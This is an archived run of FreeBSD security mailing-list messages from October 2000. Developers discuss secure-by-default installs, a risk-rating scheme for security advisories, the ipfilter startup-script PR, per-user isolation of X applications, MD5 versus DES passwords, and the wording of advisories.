From owner-freebsd-security Sun Oct 1 1:24:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id 9ECEF37B503 for ; Sun, 1 Oct 2000 01:24:28 -0700 (PDT) Received: from algroup.co.uk (socks-fw.aldigital.co.uk [192.168.254.10]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id IAA02733; Sun, 1 Oct 2000 08:23:33 GMT Message-ID: <39D6F422.CE408C66@algroup.co.uk> Date: Sun, 01 Oct 2000 09:21:54 +0100 From: Adam Laurie Organization: A.L. Group plc X-Mailer: Mozilla 4.74 [en] (X11; U; FreeBSD 3.4-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Roman Shterenzon Cc: Neil Blakey-Milner , security@FreeBSD.ORG Subject: Re: cvs commit: ports/mail/pine4 Makefile (fwd) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Roman Shterenzon wrote: > > On Sat, 30 Sep 2000, Neil Blakey-Milner wrote: > > > > > > > Surely the same applies to FreeBSD itself? > > > > > > I find it very odd that ports get so much positive pressure from this > > > list to restrict/fix/exclude them when there is a security issue, but > > > try and get something done to core FreeBSD scripts/services etc., and > > > you'll get shot down in flames... Bizarre... > > > > Can you give examples? > > I can give you an example: ipfilter in the FreeBSD. > It still doesn't have a startup script in /etc/rc* > And it's not because it doesn't exist - in fact there's conf/20202, but > nothing is being done with it. > I guess that one can think of some other examples. Some time ago I pointed out an error in the rc.firewall script (DNS & NTP rules allowed attackers to bypass firewall by setting source port), which turned into a weekend long battle (and they're still in there, BTW). I was similarly treated when I suggested we update the daily/weekly/monthly checks to look for alternative access methods (such as ssh). The current Brett Glass flame war is another example... I realise that in a lot of cases there are genuine issues between usability and security, but in both of my above examples there were no changes to services offered to the novice user (in fact they would have been invisible) - the main arguments against making the changes seemed to be "why should we? if they want to do it properly they should RTFM"... The net result is, in my opinion, a sad one. Enthusiastic and able contributors are put off from playing a useful part.... In my case I simply gave up trying to contribute - we routinely replace existing bsd scripts with our own improved ones instead. cheers, Adam -- Adam Laurie Tel: +44 (20) 8742 0755 A.L. Digital Ltd. Fax: +44 (20) 8742 5995 Voysey House Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 1:25:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id 4756C37B502 for ; Sun, 1 Oct 2000 01:25:21 -0700 (PDT) Received: from algroup.co.uk (socks-fw.aldigital.co.uk [192.168.254.10]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id IAA02741; Sun, 1 Oct 2000 08:25:13 GMT Message-ID: <39D6F48B.EC92A921@algroup.co.uk> Date: Sun, 01 Oct 2000 09:23:39 +0100 From: Adam Laurie Organization: A.L. Group plc X-Mailer: Mozilla 4.74 [en] (X11; U; FreeBSD 3.4-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Michael Bryan Cc: security@FreeBSD.ORG Subject: Re: cvs commit: ports/mail/pine4 Makefile (fwd) References: <200009301404.e8UE4xU64460@cwsys.cwsent.com> <20000930152917.E25121@149.211.6.64.reflexcom.com> <39D6707D.CEAB26E2@ursine.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Michael Bryan wrote: > > "Crist J . Clark" wrote: > > > > On Sat, Sep 30, 2000 at 11:43:20PM +0200, Roman Shterenzon wrote: > > > Still, I think the default should be "insecure" install, since most > > > machines are firewalled. > > > > [...] > > > > I guess I am one of the few that thinks we should default off for the > > good of the newbie user, rather than save the newbie 5 minutes of RTFM > > to turn on telnet and ftp. Just everyone hope no exploit like the > > recent SGI telnetd bug is ever found hiding in FreeBSD's telnetd. > > I agree, mainly for the reasons you state --- the newbies that are most > likely to install with defaults and no tweaking are often those who are > running in environments where they need the most protection. The default > install should be all services off, with an easy means to enable them > explicitly during and after an install. You can add my vote to that. cheers, Adam -- Adam Laurie Tel: +44 (20) 8742 0755 A.L. Digital Ltd. Fax: +44 (20) 8742 5995 Voysey House Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 1:25:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8875837B66C; Sun, 1 Oct 2000 01:25:25 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA82135; Sun, 1 Oct 2000 01:25:25 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Sun, 1 Oct 2000 01:25:24 -0700 From: Kris Kennaway To: Igor Roshchin Cc: security@freebsd.org Subject: Re: advisory suggestion Message-ID: <20001001012524.B9499@freefall.freebsd.org> References: <200010010212.WAA49025@giganda.komkon.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200010010212.WAA49025@giganda.komkon.org>; from str@giganda.komkon.org on Sat, Sep 30, 2000 at 10:12:38PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Sep 30, 2000 at 10:12:38PM -0400, Igor Roshchin wrote: > Affects: FreeBSD..... > ... including 3.5.1-RELEASE I thought I was doing that already..I always try and specifically mention which releases were and were not vulnerable to the problem in question. > Corrected: .... > (including 4.1.1-RELEASE [and later]) Isn't it pretty obvious that once we fix a problem, it stays fixed, and so if 4.1 is fixed then 4.1.1, 4.2, 4.3, 4.4, 4.4.145 (I predict a serious problem with that release ;-), etc are all going to be fixed? :-) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 2:33: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp02.iafrica.com (smtp02.iafrica.com [196.7.0.140]) by hub.freebsd.org (Postfix) with ESMTP id 7E3C437B502; Sun, 1 Oct 2000 02:33:02 -0700 (PDT) Received: from [196.7.18.138] (helo=grimreaper.grondar.za ident=root) by smtp02.iafrica.com with esmtp (Exim 1.92 #1) id 13ffTw-000H7Y-00; Sun, 1 Oct 2000 11:32:28 +0200 Received: from grimreaper.grondar.za (mark@localhost [127.0.0.1]) by grimreaper.grondar.za (8.11.0/8.11.0) with ESMTP id e919WRl00389; Sun, 1 Oct 2000 11:32:28 +0200 (SAST) (envelope-from mark@grimreaper.grondar.za) Message-Id: <200010010932.e919WRl00389@grimreaper.grondar.za> To: Robert Watson Cc: Warner Losh , Jordan Hubbard , security@FreeBSD.ORG Subject: Re: Security and FreeBSD, my overall perspective References: In-Reply-To: ; from Robert Watson "Sat, 30 Sep 2000 19:05:51 -0400." Date: Sun, 01 Oct 2000 11:32:26 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Exposure: > > Whether or not the application should, in normal use, be exposed to data > of untrusted origin (e-mail, data files from untrusted users, socket > connections in or out-bound, etc). > > - Intended to be run with exposure to untrusted environments > - Not intended to run with exposure to untrusted environments This is policy - we should not mess with that, I don't think. _Everything_ in Unix sees an untrusted environment is the assumption. > Auditing: > > Whether or not the application has been audited by FreeBSD security > developers, or other trusted parties. > > - Known decent > - Unknown > - Known bad I'd make this: - Known good - Believed good - Unknown - Believed bad - Known bad > Privilege: > > What amount of privilege and access this code will be run as, determining > the level of damage possible as a result of an exploit. > > - Run with elevated privilege > - Run by normal users > - Run sandboxed Right. This takes over the "exposure" item above. M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 4:20:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.vxu.se (oxeln.vxu.se [194.47.65.30]) by hub.freebsd.org (Postfix) with ESMTP id 02C6B37B502 for ; Sun, 1 Oct 2000 04:20:25 -0700 (PDT) Received: from XGod ([194.47.111.20]) by mail.vxu.se (Netscape Messaging Server 4.15) with SMTP id G1R0TZ00.27R for ; Sun, 1 Oct 2000 13:20:23 +0200 Message-ID: <002401c02b99$a07a8ab0$6400a8c0@XGod> From: "Andreas Alderud" To: Subject: Re: Security and FreeBSD, my overall perspective Date: Sun, 1 Oct 2000 13:20:38 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I think it would be wise to have three ports of the ``same´´ package. My idea is to have lets say -SECURE, -STABLE - and CURRENT (the same could be done with FreeBSD itself). The good thing about this would be that if a port is labeled -SECURE it's not necessary the most recent -STABLE version, obviously, and the -SECURE port could the be marked with a N-value for security level. The real advantage of this would be if the BSDs would have a unified ports system, as proposed by Chris Coleman, and incorperate the ideas of Jordans paper on the future package system. Because many developers find security auditing a boring task, me included, this task could then be handled, in most cases, by the OpenBSD or similar team since they like to do that kind of stuff. - This would only happen if there was a unified ports system. Doing this would also help people like me who hate to be forced to either port an old version of a software or run the latest port that most often is alpha or beta(typical opensource style :-( ), because I could either run -STABLE or -SECURE depending on my level of paranoia. And people who like to stay on the bleeding edge con do that with -CURRENT. But then most of the problems would go away if FreeBSD got MAC etc, fortanly the TrustedBSD team is working on that. /Kind regards, David A. Alderud To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 4:36: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.kyx.net (cr95838-b.crdva1.bc.wave.home.com [24.113.50.147]) by hub.freebsd.org (Postfix) with ESMTP id 6C17837B502 for ; Sun, 1 Oct 2000 04:36:00 -0700 (PDT) Received: from smp.kyx.net (unknown [10.22.22.45]) by mail.kyx.net (Postfix) with SMTP id A01BE1DC03; Sun, 1 Oct 2000 04:35:54 -0700 (PDT) From: Dragos Ruiu Organization: kyx.net To: "Andreas Alderud" , Subject: Re: Security and FreeBSD, my overall perspective Date: Sun, 1 Oct 2000 04:33:18 -0700 X-Mailer: KYX-CP/M [version core00-mail-92] Content-Type: text/plain References: <002401c02b99$a07a8ab0$6400a8c0@XGod> In-Reply-To: <002401c02b99$a07a8ab0$6400a8c0@XGod> MIME-Version: 1.0 Message-Id: <0010010437162T.11814@smp.kyx.net> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 01 Oct 2000, Andreas Alderud wrote: > I think it would be wise to have three ports of the ``same´´ package. > My idea is to have lets say -SECURE, -STABLE - and CURRENT (the same could > be done with FreeBSD itself). If you are going to unify the BSD ports please make sure there is a nice way to organize the ports subset onto a CD, image, transfer etc... I kinda like the lighter more stripped down - and therefore easier to manipulate OpenBSD ports tree... while the FreeBSD one is nice for comprehensiveness..... (Just so we don't start any religious debates here. :-) --dr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 6:15:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 67A2637B503 for ; Sun, 1 Oct 2000 06:15:39 -0700 (PDT) Received: (qmail 11330 invoked by uid 0); 1 Oct 2000 13:15:37 -0000 Received: from p3ee20aa4.dip.t-dialin.net (HELO speedy.gsinet) (62.226.10.164) by mail.gmx.net with SMTP; 1 Oct 2000 13:15:37 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id LAA30857 for security@FreeBSD.ORG; Sun, 1 Oct 2000 11:29:44 +0200 Date: Sun, 1 Oct 2000 11:29:44 +0200 From: Gerhard Sittig To: security@FreeBSD.ORG Subject: Re: cvs commit: ports/mail/pine4 Makefile (fwd) Message-ID: <20001001112944.A5065@speedy.gsinet> Mail-Followup-To: security@FreeBSD.ORG References: <20000930160432.A15451@mithrandr.moria.org> <20000930234530.A18517@mithrandr.moria.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20000930234530.A18517@mithrandr.moria.org>; from nbm@mithrandr.moria.org on Sat, Sep 30, 2000 at 11:45:30PM +0200 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Sep 30, 2000 at 23:45 +0200, Neil Blakey-Milner wrote: > > On Sat 2000-09-30 (23:37), Roman Shterenzon wrote: > > > > I can give you an example: ipfilter in the FreeBSD. > > It still doesn't have a startup script in /etc/rc* > > And it's not because it doesn't exist - in fact there's > > conf/20202, but nothing is being done with it. I still see this as partially caused by me (the originator). But after your feedback and proofreading I (finally) plan on replying to the PR with a cleanup -- to collect all the essence in a single message. That's what I hope makes this proposal easier to review, judge, commit and MFC. :) It will happen in the next week's beginning, when I have Darren's response (see below). > I can't see how this was shot down. Darren just doesn't seem > to have done anything about it. Reply to the PR, and ask if he > still intends to do anything about it, and if he doesn't, then > we can assign it to someone else. That's what I've done yesterday (ask Darren about which form of input makes the patch the most comfortable to handle), the reply is still on its way. And I don't blame Darren for not committing the patch yet. In the current form it's not very attractive or easy to handle; and FreeBSD work probably has lower prio in his busy job. BTW: May I point to <20000915203531.E27034@speedy.gsinet>? ------------------------------------------------------- Date: Fri, 15 Sep 2000 20:35:31 +0200 From: Gerhard Sittig To: "freebsd-security@FreeBSD.ORG" Subject: Re: ipf logging ------------------------------------------------------- Therein I asked this very question "What can *I* do to make it better?" (i.e. reduce reluctance or reasons for ignoring the PR without baffling anyone and thus making things worse) -- there was no response. But I guess it was due to its being buried in another thread. > While it would be nice if developers regularly chased up things > assigned to other developers and left for a while, it's best > for the originator or stakeholders to actually _say_ something > about it _in the PR_ and to the relevant lists if things go by > too long. When Darren cannot or won't act after the next f'up within a couple of weeks I will step up with the request to have the PR assigned to some other committer. Since it doesn't deal with ipf's internals but "only" invokes utilities in the startup scripts I don't see a problem with this. It's not about changing architecture or topology. It's not about forcing ipfw users to change. It's just about reducing conflicts for those utilizing ipf in a FreeBSD environment. Until then everyone is free to extend rc.network by himself (we're talking about admins here able to take their own actions after deciding themselfes for a tool). And I'm very well aware of the fact that invoking send-pr doesn't give any warranty about being heard or committed. But I would like to get negative feedback as well if anyone sees a need for objection. Up to now there was only positive feedback (and silence:). virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 7: 2: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 32AB237B66D for ; Sun, 1 Oct 2000 07:01:59 -0700 (PDT) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id KAA53547; Sun, 1 Oct 2000 10:01:52 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Sun, 1 Oct 2000 10:01:51 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Garrett Wollman Cc: cjclark@alum.mit.edu, security@FreeBSD.ORG Subject: Re: Multiple userids, one user In-Reply-To: <200010010526.BAA12242@khavrinen.lcs.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 1 Oct 2000, Garrett Wollman wrote: > < said: > > > Why not just run each program under a different user? > > To some extent I do this. When I am forced to use a Web browser > configured insecurely (which for some inexplicable reason always seems > to involve managing my finances), I switch to another VT, log in as my > alter ego, and do what I need to do. Of course, not even my alter ego > gives a valid e-mail address to the Web browser.... One of the problems with this technique is X Windows -- while FreeBSD will provide effective partitioning of users for the purposes of integrity (confidentiality is another question given our default permissions :-), providing the application with unfettered access to your X display does a lot to undo those benefits. At one point, I was using Xnest as a target display for SSH sessions to untrusted workstations. While it was not designed for that (and probably needs auditing), it's a step forwards. Assigning an Xnest per virtual uid would reflect the kernel-visible partitioning scheme. There are been a number of attempts at CMW (Compartmental Mode Workstations) X environments that prevent control/information leakage between labeled processes, but those have some practicality limits (aside from not being available freely :-). I was also told at one point that the new Broadway X Windows would have facilities for isolating and limiting the scope of particular applications, with things like web browsing, untrusted clients, etc, in mind. Not sure if anything came of that. Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 7:51:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id BCA4137B502 for ; Sun, 1 Oct 2000 07:51:54 -0700 (PDT) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id KAA53996; Sun, 1 Oct 2000 10:51:27 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Sun, 1 Oct 2000 10:51:27 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Mark Murray Cc: Warner Losh , Jordan Hubbard , security@FreeBSD.ORG Subject: Re: Security and FreeBSD, my overall perspective In-Reply-To: <200010010932.e919WRl00389@grimreaper.grondar.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 1 Oct 2000, Mark Murray wrote: > > Exposure: > > > > Whether or not the application should, in normal use, be exposed to data > > of untrusted origin (e-mail, data files from untrusted users, socket > > connections in or out-bound, etc). > > > > - Intended to be run with exposure to untrusted environments > > - Not intended to run with exposure to untrusted environments > > This is policy - we should not mess with that, I don't think. _Everything_ > in Unix sees an untrusted environment is the assumption. While I agree that is true, I think that we regularly make distinctions, for the purposes of advisories, between buffer overflows in command line tool arguments of binaries that do not elevate privielges, and those that do. Similarly, we consider overflows in command line arguments of tools running with privilege and overflows in input/output of tools running with privilege. So there is something in this distinction that is worth considering. Certainly, it is the case that all of them should be fixed, but it's not clear that all are worth an advisory, and that our risk/trust factor shouldn't reflect that distinction. > > Privilege: > > > > What amount of privilege and access this code will be run as, determining > > the level of damage possible as a result of an exploit. > > > > - Run with elevated privilege > > - Run by normal users > > - Run sandboxed The reason I made this distinction was to try and quantify the cost of a software failure: if Apache is compromised running as nobody, that's substantially better than inetd compromised running as root. Not ideal, mind you, but in the grant scale of things, an improvement (hence why it runs as nobody :-). I think this is a quantafiably different measure than the amount of risk associated with the program due to the type and quality of data it processes. There probably needs to be another couple of items here quantifying network compromise (i.e., firewall proxy failure, etc). Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 10:16:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id DB57737B502 for ; Sun, 1 Oct 2000 10:16:45 -0700 (PDT) Received: (qmail 4093 invoked by uid 0); 1 Oct 2000 17:16:44 -0000 Received: from p3ee21622.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.34) by mail.gmx.net with SMTP; 1 Oct 2000 17:16:44 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id PAA31336 for security@FreeBSD.ORG; Sun, 1 Oct 2000 15:48:02 +0200 Date: Sun, 1 Oct 2000 15:48:02 +0200 From: Gerhard Sittig To: security@FreeBSD.ORG Subject: Re: Security and FreeBSD, my overall perspective Message-ID: <20001001154802.C5065@speedy.gsinet> Mail-Followup-To: security@FreeBSD.ORG References: <002401c02b99$a07a8ab0$6400a8c0@XGod> <0010010437162T.11814@smp.kyx.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <0010010437162T.11814@smp.kyx.net>; from dr@kyx.net on Sun, Oct 01, 2000 at 04:33:18AM -0700 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Oct 01, 2000 at 04:33 -0700, Dragos Ruiu wrote: > > If you are going to unify the BSD ports please make sure there > is a nice way to organize the ports subset onto a CD, image, > transfer etc... Isn't there already such a project? I remember to have read about it in the last two weeks. If only I had set a bookmark! But the effort put into the several distro's ports system could gain really overwhelming results when it's bundled ... virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 13:51: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from sentry.granch.com (sentry.granch.com [212.109.197.55]) by hub.freebsd.org (Postfix) with ESMTP id B940037B502 for ; Sun, 1 Oct 2000 13:50:51 -0700 (PDT) Received: from sentry.granch.ru (IDENT:shelton@localhost [127.0.0.1]) by sentry.granch.com (8.9.3/8.9.3) with ESMTP id DAA54970; Mon, 2 Oct 2000 03:22:08 +0700 (NOVST) Message-ID: <39D79CF0.D794F732@sentry.granch.ru> Date: Mon, 02 Oct 2000 03:22:08 +0700 From: "Rashid N. Achilov" Reply-To: achilov@granch.ru Organization: Granch Ltd. X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: ru, en MIME-Version: 1.0 To: "Vladimir B. Grebenschikov" Cc: freebsd-security@FreeBSD.ORG Subject: Re: MD5 passwords vs DES References: <14789.42660.401430.305445@vbook.express.ru> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Vladimir B. Grebenschikov" wrote: > > I have a question: > > Do anybody have ideas to add 'default crypting mode' for utilities > like passwd, adduser, etc ? > Manually change for all users passwords to MD5, than simply edit symlink libcrypt.so.2 (I assume 4.1-RELEASE) to point to a libscrypt.so.2 and libcrypt.a to point to a libscrypt.a. Now you can't use DES passwords until revert back links, but all created users now will have MD5-crypted passwords -- With Best Regards. Rashid N. Achilov (RNA1-RIPE), Brainbench ID: 28514 Granch Ltd. lead engineer, e-mail: achilov@granch.ru tel/fax (383-2) 24-2363 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 13:58:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from klapaucius.zer0.org (klapaucius.zer0.org [204.152.186.45]) by hub.freebsd.org (Postfix) with ESMTP id 3B2D237B503 for ; Sun, 1 Oct 2000 13:58:11 -0700 (PDT) Received: by klapaucius.zer0.org (Postfix, from userid 1001) id 0D19E239A48; Sun, 1 Oct 2000 13:58:11 -0700 (PDT) Date: Sun, 1 Oct 2000 13:58:11 -0700 From: Gregory Sutter To: Gerhard Sittig Cc: security@FreeBSD.ORG Subject: Re: Security and FreeBSD, my overall perspective Message-ID: <20001001135810.I23587@klapaucius.zer0.org> References: <002401c02b99$a07a8ab0$6400a8c0@XGod> <0010010437162T.11814@smp.kyx.net> <20001001154802.C5065@speedy.gsinet> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001001154802.C5065@speedy.gsinet>; from Gerhard.Sittig@gmx.net on Sun, Oct 01, 2000 at 03:48:02PM +0200 Organization: Zer0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 2000-10-01 15:48 +0200, Gerhard Sittig wrote: > On Sun, Oct 01, 2000 at 04:33 -0700, Dragos Ruiu wrote: > > > > If you are going to unify the BSD ports please make sure there > > is a nice way to organize the ports subset onto a CD, image, > > transfer etc... > > Isn't there already such a project? I remember to have read > about it in the last two weeks. If only I had set a bookmark! > But the effort put into the several distro's ports system could > gain really overwhelming results when it's bundled ... http://www.openpackages.org/ Greg -- Gregory S. Sutter Bureaucrats cut red tape--lengthwise. mailto:gsutter@zer0.org http://www.zer0.org/~gsutter/ PGP DSS public key 0x40AE3052 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 14: 9:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 8BD1F37B502; Sun, 1 Oct 2000 14:09:22 -0700 (PDT) Received: (from str@localhost) by giganda.komkon.org (8.9.3/8.9.3) id RAA56369; Sun, 1 Oct 2000 17:09:22 -0400 (EDT) (envelope-from str) Date: Sun, 1 Oct 2000 17:09:22 -0400 (EDT) From: Igor Roshchin Message-Id: <200010012109.RAA56369@giganda.komkon.org> To: kris@FreeBSD.org Subject: Re: advisory suggestion Cc: security@FreeBSD.org In-Reply-To: <20001001012524.B9499@freefall.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Date: Sun, 1 Oct 2000 01:25:24 -0700 > From: Kris Kennaway > Subject: Re: advisory suggestion > > On Sat, Sep 30, 2000 at 10:12:38PM -0400, Igor Roshchin wrote: > > > Affects: FreeBSD..... > > ... including 3.5.1-RELEASE > > I thought I was doing that already..I always try and specifically > mention which releases were and were not vulnerable to the problem in > question. Yes, it is usually well done! You probably forgot about these additional "technical" releases (x.x.1) (which are not even mentioned on www.Freebsd.org) > > > Corrected: .... > > (including 4.1.1-RELEASE [and later]) > > Isn't it pretty obvious that once we fix a problem, it stays fixed, > and so if 4.1 is fixed then 4.1.1, 4.2, 4.3, 4.4, 4.4.145 (I predict a > serious problem with that release ;-), etc are all going to be fixed? > :-) "and later" was put in the square brackets because it was obvious :) The point was in "including 4.1.1-RELEASE" It makes it convenient if releases that are out at the time when the advisory is issued, to mention them explicitely. In this case, it was written, that 4.1-STABLE is fixed as of xx.xx.2000 It's clear that it is fixed in 4.2-RELEASE (whenever it's out) , but not clear about 4.1.1-RELEASE (you need to compare the dates) Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 14:11:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0F50237B503; Sun, 1 Oct 2000 14:11:21 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA39188; Sun, 1 Oct 2000 14:11:21 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Sun, 1 Oct 2000 14:11:20 -0700 From: Kris Kennaway To: Igor Roshchin Cc: kris@FreeBSD.org, security@FreeBSD.org Subject: Re: advisory suggestion Message-ID: <20001001141120.A37225@freefall.freebsd.org> References: <20001001012524.B9499@freefall.freebsd.org> <200010012109.RAA56369@giganda.komkon.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200010012109.RAA56369@giganda.komkon.org>; from str@giganda.komkon.org on Sun, Oct 01, 2000 at 05:09:22PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Oct 01, 2000 at 05:09:22PM -0400, Igor Roshchin wrote: > In this case, it was written, that 4.1-STABLE is fixed as of xx.xx.2000 > It's clear that it is fixed in 4.2-RELEASE (whenever it's out) , > but not clear about 4.1.1-RELEASE (you need to compare the dates) > Oh, I see what you meant - I forgot to mention this in the most recent catopen advisory. Sorry - I'll try and remember for the future. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 14:33:27 2000 Delivered-To: 